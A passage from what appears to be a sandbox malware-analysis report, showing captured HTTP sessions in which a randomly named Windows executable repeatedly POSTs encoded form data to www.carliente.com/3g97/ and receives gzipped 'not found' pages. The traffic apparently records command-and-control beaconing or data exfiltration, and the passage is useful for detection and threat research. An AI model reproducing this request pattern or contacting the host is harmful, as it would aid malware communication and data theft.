64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:26.353208065 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:26.353230953 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.449758217.160.0.111801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:32.176814079 CEST728OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.carliente.com
                                                                                              Referer: http://www.carliente.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6b 75 45 56 4c 4d 77 65 55 6f 44 74 67 30 4b 77 69 63 72 34 58 2f 4a 48 63 66 70 78 6e 4d 4c 5a 6a 55 6d 6b 4c 48 72 35 6c 39 59 32 6e 36 6e 51 51 38 56 45 52 4a 55 53 75 37 55 43 50 63 47 38 2b 62 32 7a 6d 48 62 76 71 47 51 7a 63 38 52 2f 56 5a 63 55 46 78 55 6b 31 35 55 68 59 48 78 2b 6c 6d 48 76 44 72 6d 5a 68 67 6d 34 71 53 6c 6e 6a 4f 65 79 48 44 66 4d 4a 4c 43 41 34 77 6a 50 63 31 78 2f 6d 55 36 4f 79 61 68 6c 73 62 6e 6b 67 35 42 43 39 56 6a 48 78 55 4c 62 41 7a 61 4a 6b 47 4b 6a 62 6a 71 77 46 36 4c 4c 63 72 43 55 59 78 51 2f 44 32 71 49 43 58 30 51 6f 36 55 6f 59 51 3d 3d
                                                                                              Data Ascii: 12l42=kuEVLMweUoDtg0Kwicr4X/JHcfpxnMLZjUmkLHr5l9Y2n6nQQ8VERJUSu7UCPcG8+b2zmHbvqGQzc8R/VZcUFxUk15UhYHx+lmHvDrmZhgm4qSlnjOeyHDfMJLCA4wjPc1x/mU6Oyahlsbnkg5BC9VjHxULbAzaJkGKjbjqwF6LLcrCUYxQ/D2qICX0Qo6UoYQ==
                                                                                              Apr 24, 2024 07:27:32.482180119 CEST1289INHTTP/1.1 200 OK
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Date: Wed, 24 Apr 2024 05:27:32 GMT
                                                                                              Server: Apache
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db 35 72 ff 9d ba 3d 1d 05 2c 60 e1 24 e3 09 8b 63 9e c1 98 52 56 fa 6c 61 03 72 c6 c5 9f 55 d3 b6 b3 57 55 1e cc ff e2 cb e3 a7 c5 d8 f1 2c c6 4e e2 38 fa 87 58 2f 36 c2 d4 ac 68 85 86 39 62 c4 ca d3 d1 75 98 f1 dc cb 44 c2 d3 a9 67 49 e0 05 5e e8 27 3c a3 df 55 34 e5 e9 f9 93 49 2f 4e 78 ec 65 37 51 cc 27 ff 26 78 33 e5 c9 79 c4 e3 cc b3 84 94 06 5e 94 f1 c8 cb 7e 1b 31 38 b3 d3 95 ea d7 a7 23 7b db 0a 23 bf f1 43 1e 33 1f ec df 8e c6 67 8f 4c 5d 3a 53 e1 96 cc 8b 23 3e 2d 88 15 8a 27 64 22 ae a9 9f d9 e7 14 d2 a1 17 f8 89 cf 43 7f c2 23 1f 7f 21 b8 f0 14 f2 dc c7 1d 5d 20 7b 63 b5 04 74 6b 59 32 2f e4 09 9e 48 19 14 78 31 0f 61 69 ca 23 d0 88 27 64 3a 9f 42 9b bd c0 42 ac 61 87 41 49 67 ec 43 40 24 c4 6d 89 45 0b db ec 7a 05 26 33 30 a5 18 48 08 9e bd a6 7c 62 95 e0 8a e7 1c 2b 26 b0 38 13 61 e2 e1 cf c6 00 e1 c0 9a 69 01 51 6b c0 04 a6 25 1e 8f 34 40 40 1a 14 bf f8 26 4c 0a 04 0c 6a b1 3a 10 60 25 a8 e0 99 a6 1b 72 40 6a a7 0a 3f a2 f5 3c e0 27 14 58 9c 64 2c 4d ed 1d 80 f3 29 c6 89 85 60 da 41 58 80 fb d0 4b ad 48 0a 8f c0 c2 80 87 58 c9 52 6b 27 6c 84 a9 f9 75 96 81 33 04 08 ac 45 5e 24 dc a0 13 8a 43 b8 0b 73 e1 2c 1b d0 c1 3c c2 90 5e a5 36 9c c4 4f d6 c3 58 07 22 bd 71 aa 88 8d 54 41 25 54 c1 cf 56 90 98 11 d7 a9 bd 40 cb 0e f7 e7 00 64 b1 90 bb 00 cf 4b 61 26 bc 74 05 c3 a2 02 a8 08 32 ac 21 4a bf 1d 25 12 50 a7 ce 73 14 2c 12 9f 5c 4f 29 4d 63 70 5e 4d e1 73 81 48 13 7e 10 07 17 61 c6 6a ad 4f 59 97 5e e5 13 9e ef e0 15 eb f5 a7 d8 f2 88 e7 94 ac 1f 43 07 48 05 c1 a0 28 3b 8b 28 76 93 1a 19 51 58 cf c1 a9 64 48 4a 5e e5 29 45 1d 59 42 16 e6 14 07 04 dd e6 64 4e 6c 94 56 1e a5 0f 72 8e 06 40 0e b6 22 32 6f 01 08 b2 31 7c 40 71 85 1c 00 10 a4 e8 7a 6a 31 a7 22 8c 78 86 b4 b1 94 24 29 bf b1 61 90 2a 39 45 db 51 37 11 7b 88 66 ca a7 75 82 cc a4 0c a2 6d 06 65 48 c0 4c c4 3c 27 2b 41 2c b3 87 20 61 86 dc 0c 6c e4 68 44 12 1b 0d 34 5f 43 29 d0 4c 79 54 fb 11 f9 2f 07 34 10 12 74 dc 50 ff 36 0c 91 92 53 b8 c5 cf 79 dc 92 bb 00 2f 84 c2 d8 6e 0e 8a 17 06 49 14 2c 58 e2 c1 db 48 7e ca 25 5c 72 01 9f c6 70 1a 88 d5 8e 4d 84 99 f0 6d 18 40 30 c6 da 39 6d 19 10 37 4b a9 06 55 35 74 0e 10 91 92 b4 35 5c 24 5a 84 dd 8b 02 d4 be 90 93 02 22 83 5a 32 20 80 f5 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4
                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~%\rpMm@09m7KU5t5\$Z"Z2 H|JpBbEE&J0a9e7wDa
                                                                                              Apr 24, 2024 07:27:32.482213020 CEST846INData Raw: c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 90 1f 13 58 fc 28 33 52 6c e9 a9 bd c2 43 1a 8f 54 42 68 18 8f 70 3d e5 35 6a 1e d8 f1 ba 21 51 0d 3d 48 61 ab b9 a0 39 aa 64 e0 47 ee 53 a1 4a 3d 52 43 b9 0d
                                                                                              Data Ascii: %oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.Q"xX[iokc:8W


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.449759217.160.0.111801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:35.011996031 CEST748OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.carliente.com
                                                                                              Referer: http://www.carliente.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6b 75 45 56 4c 4d 77 65 55 6f 44 74 76 30 36 77 75 63 58 34 66 2f 4a 49 51 2f 70 78 38 38 4c 6e 6a 55 71 6b 4c 46 47 38 6d 4c 77 32 6d 62 58 51 52 39 56 45 53 4a 55 53 6c 62 55 48 4c 63 47 6e 2b 61 4c 41 6d 47 33 76 71 47 73 7a 63 35 31 2f 56 49 63 54 48 68 55 36 36 5a 55 6a 46 58 78 2b 6c 6d 48 76 44 72 43 7a 68 6a 57 34 71 69 31 6e 69 74 47 78 4c 6a 66 50 4f 4c 43 41 72 67 69 45 63 31 78 4a 6d 52 69 6b 79 66 6c 6c 73 62 58 6b 67 6f 42 64 6f 6c 69 4d 73 6b 4b 4e 4f 6a 33 74 6b 56 33 7a 62 67 33 65 48 66 76 79 51 4e 54 4f 4a 41 78 6f 52 32 4f 37 66 51 39 6b 6c 35 70 68 44 55 48 58 67 71 4a 4f 56 56 7a 50 74 6f 54 39 53 73 39 39 30 45 67 3d
                                                                                              Data Ascii: 12l42=kuEVLMweUoDtv06wucX4f/JIQ/px88LnjUqkLFG8mLw2mbXQR9VESJUSlbUHLcGn+aLAmG3vqGszc51/VIcTHhU66ZUjFXx+lmHvDrCzhjW4qi1nitGxLjfPOLCArgiEc1xJmRikyfllsbXkgoBdoliMskKNOj3tkV3zbg3eHfvyQNTOJAxoR2O7fQ9kl5phDUHXgqJOVVzPtoT9Ss990Eg=
                                                                                              Apr 24, 2024 07:27:35.320136070 CEST1289INHTTP/1.1 200 OK
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Date: Wed, 24 Apr 2024 05:27:35 GMT
                                                                                              Server: Apache
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db 35 72 ff 9d ba 3d 1d 05 2c 60 e1 24 e3 09 8b 63 9e c1 98 52 56 fa 6c 61 03 72 c6 c5 9f 55 d3 b6 b3 57 55 1e cc ff e2 cb e3 a7 c5 d8 f1 2c c6 4e e2 38 fa 87 58 2f 36 c2 d4 ac 68 85 86 39 62 c4 ca d3 d1 75 98 f1 dc cb 44 c2 d3 a9 67 49 e0 05 5e e8 27 3c a3 df 55 34 e5 e9 f9 93 49 2f 4e 78 ec 65 37 51 cc 27 ff 26 78 33 e5 c9 79 c4 e3 cc b3 84 94 06 5e 94 f1 c8 cb 7e 1b 31 38 b3 d3 95 ea d7 a7 23 7b db 0a 23 bf f1 43 1e 33 1f ec df 8e c6 67 8f 4c 5d 3a 53 e1 96 cc 8b 23 3e 2d 88 15 8a 27 64 22 ae a9 9f d9 e7 14 d2 a1 17 f8 89 cf 43 7f c2 23 1f 7f 21 b8 f0 14 f2 dc c7 1d 5d 20 7b 63 b5 04 74 6b 59 32 2f e4 09 9e 48 19 14 78 31 0f 61 69 ca 23 d0 88 27 64 3a 9f 42 9b bd c0 42 ac 61 87 41 49 67 ec 43 40 24 c4 6d 89 45 0b db ec 7a 05 26 33 30 a5 18 48 08 9e bd a6 7c 62 95 e0 8a e7 1c 2b 26 b0 38 13 61 e2 e1 cf c6 00 e1 c0 9a 69 01 51 6b c0 04 a6 25 1e 8f 34 40 40 1a 14 bf f8 26 4c 0a 04 0c 6a b1 3a 10 60 25 a8 e0 99 a6 1b 72 40 6a a7 0a 3f a2 f5 3c e0 27 14 58 9c 64 2c 4d ed 1d 80 f3 29 c6 89 85 60 da 41 58 80 fb d0 4b ad 48 0a 8f c0 c2 80 87 58 c9 52 6b 27 6c 84 a9 f9 75 96 81 33 04 08 ac 45 5e 24 dc a0 13 8a 43 b8 0b 73 e1 2c 1b d0 c1 3c c2 90 5e a5 36 9c c4 4f d6 c3 58 07 22 bd 71 aa 88 8d 54 41 25 54 c1 cf 56 90 98 11 d7 a9 bd 40 cb 0e f7 e7 00 64 b1 90 bb 00 cf 4b 61 26 bc 74 05 c3 a2 02 a8 08 32 ac 21 4a bf 1d 25 12 50 a7 ce 73 14 2c 12 9f 5c 4f 29 4d 63 70 5e 4d e1 73 81 48 13 7e 10 07 17 61 c6 6a ad 4f 59 97 5e e5 13 9e ef e0 15 eb f5 a7 d8 f2 88 e7 94 ac 1f 43 07 48 05 c1 a0 28 3b 8b 28 76 93 1a 19 51 58 cf c1 a9 64 48 4a 5e e5 29 45 1d 59 42 16 e6 14 07 04 dd e6 64 4e 6c 94 56 1e a5 0f 72 8e 06 40 0e b6 22 32 6f 01 08 b2 31 7c 40 71 85 1c 00 10 a4 e8 7a 6a 31 a7 22 8c 78 86 b4 b1 94 24 29 bf b1 61 90 2a 39 45 db 51 37 11 7b 88 66 ca a7 75 82 cc a4 0c a2 6d 06 65 48 c0 4c c4 3c 27 2b 41 2c b3 87 20 61 86 dc 0c 6c e4 68 44 12 1b 0d 34 5f 43 29 d0 4c 79 54 fb 11 f9 2f 07 34 10 12 74 dc 50 ff 36 0c 91 92 53 b8 c5 cf 79 dc 92 bb 00 2f 84 c2 d8 6e 0e 8a 17 06 49 14 2c 58 e2 c1 db 48 7e ca 25 5c 72 01 9f c6 70 1a 88 d5 8e 4d 84 99 f0 6d 18 40 30 c6 da 39 6d 19 10 37 4b a9 06 55 35 74 0e 10 91 92 b4 35 5c 24 5a 84 dd 8b 02 d4 be 90 93 02 22 83 5a 32 20 80 f5 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4
                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~%\rpMm@09m7KU5t5\$Z"Z2 H|JpBbEE&J0a9e7wDa
                                                                                              Apr 24, 2024 07:27:35.320178986 CEST846INData Raw: c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 90 1f 13 58 fc 28 33 52 6c e9 a9 bd c2 43 1a 8f 54 42 68 18 8f 70 3d e5 35 6a 1e d8 f1 ba 21 51 0d 3d 48 61 ab b9 a0 39 aa 64 e0 47 ee 53 a1 4a 3d 52 43 b9 0d
                                                                                              Data Ascii: %oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.Q"xX[iokc:8W


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.449760217.160.0.111801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:38.330450058 CEST10830OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.carliente.com
                                                                                              Referer: http://www.carliente.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6b 75 45 56 4c 4d 77 65 55 6f 44 74 76 30 36 77 75 63 58 34 66 2f 4a 49 51 2f 70 78 38 38 4c 6e 6a 55 71 6b 4c 46 47 38 6d 4c 49 32 6e 70 7a 51 52 65 74 45 54 4a 55 53 6d 62 55 47 4c 63 48 33 2b 62 6a 66 6d 48 4b 53 71 44 6f 7a 47 66 70 2f 42 71 34 54 4e 68 55 36 34 5a 55 2b 59 48 78 72 6c 6d 57 6d 44 72 53 7a 68 6a 57 34 71 6b 78 6e 6c 2b 65 78 4e 6a 66 4d 4a 4c 43 45 34 77 6a 6a 63 31 70 5a 6d 52 57 65 7a 73 74 6c 73 37 48 6b 68 65 64 64 71 46 69 4f 38 30 4b 46 4f 6a 37 79 6b 56 37 2f 62 6a 71 46 48 5a 54 79 42 72 72 53 52 78 45 2b 4e 6b 4b 46 49 69 35 45 69 2b 63 6d 4a 6e 4c 5a 74 66 42 74 4e 56 6a 69 71 4c 79 66 47 63 56 39 71 42 55 6d 54 57 63 75 69 31 6d 46 79 49 73 35 4b 66 58 6d 38 4c 41 58 4e 54 31 48 4d 72 77 72 33 61 67 37 6e 51 6a 50 55 2b 78 69 54 63 52 4c 63 63 2b 2f 79 39 32 32 7a 5a 35 46 70 64 50 57 2b 49 4a 42 4c 34 33 62 42 63 6f 69 54 38 70 61 69 35 56 45 54 66 70 37 4e 73 37 64 6a 59 34 47 4a 64 4d 49 43 6e 6e 5a 50 7a 35 58 69 33 71 44 71 4d 50 61 56 62 30 43 64 47 45 43 47 45 7a 71 37 57 50 4b 74 4a 6b 48 72 7a 49 67 55 72 79 52 43 35 5a 7a 66 30 36 69 76 56 6c 37 51 79 35 75 56 63 33 2f 4c 32 43 37 44 38 77 39 30 78 4e 33 75 76 34 32 45 42 62 77 66 33 79 4d 58 61 57 4f 44 4f 70 71 71 6c 6b 38 72 57 30 45 6a 32 2f 6e 6c 4c 35 6b 51 5a 68 4c 6f 39 4b 32 6e 2f 51 51 44 36 58 52 53 48 65 6e 73 4b 53 63 33 6c 36 4c 67 42 4c 72 49 4d 78 33 38 4d 34 34 6a 4a 32 77 46 59 76 31 53 46 54 73 74 6e 31 73 47 72 63 69 7a 5a 68 68 6a 49 46 5a 4d 43 76 70 6b 5a 35 2b 35 59 5a 4d 56 37 4d 6c 56 39 53 48 59 34 33 2f 50 53 73 56 43 6e 42 31 54 49 61 50 50 30 79 6a 49 6d 4a 4c 36 50 33 4d 78 6c 4f 6e 6f 4c 67 30 2f 70 4b 69 58 51 70 7a 48 71 6d 6c 4b 32 2b 2f 47 43 4d 38 6c 49 64 57 71 4b 69 55 6c 67 6c 77 62 78 7a 53 2b 76 32 33 39 38 53 44 30 75 58 45 58 56 57 69 61 61 48 50 7a 5a 43 4c 37 76 6f 6a 71 68 76 6c 39 6b 4d 7a 4e 6a 39 61 62 4b 50 75 65 77 39 57 74 70 48 6a 41 6f 64 2f 52 33 58 52 57 48 46 49 2f 4e 77 57 2b 49 2b 39 65 6e 6e 62 51 5a 4b 64 43 76 2f 33 6c 47 2b 45 31 4f 51 37 70 58 66 55 38 35 47 57 4b 63 77 44 73 6a 58 52 6d 69 6b 77 46 47 6d 44 75 37 5a 4f 39 36 6c 69 36 64 70 38 46 38 51 47 58 49 4e 37 56 2f 41 48 44 77 70 79 67 61 46 45 4c 59 6d 58 44 7a 4c 6d 58 39 33 56 65 6d 4f 78 4a 78 4a 6f 57 56 36 4a 2b 58 47 6a 4d 6a 34 5a 69 57 58 39 4e 6c 65 52 55 64 6c 6d 71 45 58 48 6f 49 70 31 67 69 75 74 79 52 38 45 55 4c 2f 32 76 32 59 43 48 49 74 42 56 35 36 6e 51 42 56 6b 72 6b 73 68 55 59 48 34 61 45 55 61 41 51 45 70 58 4d 59 66 32 49 31 71 64 70 30 72 65 63 2b 41 4c 31 66 36 32 44 42 74 4d 30 6f 79 73 7a 6f 47 77 4c 37 6c 56 6e 78 46 6c 45 6d 59 38 45 48 43 63 71 51 2b 79 78 43 44 55 38 55 4a 73 65 2f 45 71 57 47 76 6d 6b 31 56 58 51 72 37 73 62 4c 6b 6b 62 79 6f 74 67 69 73 79 53 52 46 6c 4e 64 63 70 61 69 56 39 6e 36 45 68 31 67 56 48 71 68 6a 68 69 69 4c 4e 53 58 35 36 6a 58 76 78 64 34 59 46 49 52 43 55 35 74 37 71 4c 61 6a 35 5a 49 63 35 79 2b 4e 54 52 49 64 39 46 44 72 4a 63 69 6c 47 52 2f 4f 6f 46 32 58 36 64 47 4e 78 51 69 30 48 68 36 5a 42 6a 68 48 6a 7a 58 75 32 30 39 66 53 6e 42 62 57 36 34 50 35 53 62 34 77 49 48 65 39 72 74 32 75 57 6e 4c 70 78 47 4e 2f 79 35 34 6b 32 5a 30 76 